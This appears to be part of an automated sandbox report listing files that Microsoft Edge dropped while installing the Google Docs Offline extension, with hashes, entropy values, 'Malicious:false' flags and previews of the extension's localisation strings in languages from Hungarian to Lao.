                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                              MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                              SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                              SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                              SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2771
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                              MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                              SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                              SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                              SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):858
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                              MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                              SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                              SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                              SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):954
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                              MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                              SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                              SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                              SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):899
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                              MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                              SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                              SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                              SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2230
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                              MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                              SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                              SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                              SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1160
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                              MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                              SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                              SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                              SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3264
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                              MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                              SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                              SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                              SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3235
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                              MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                              SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                              SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                              SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3122
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                              MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                              SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                              SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                              SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1895
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                              MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                              SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                              SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                              SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1042
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                              MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                              SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                              SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                              SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2535
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                              MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                              SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                              SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                              SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                              Malicious:false
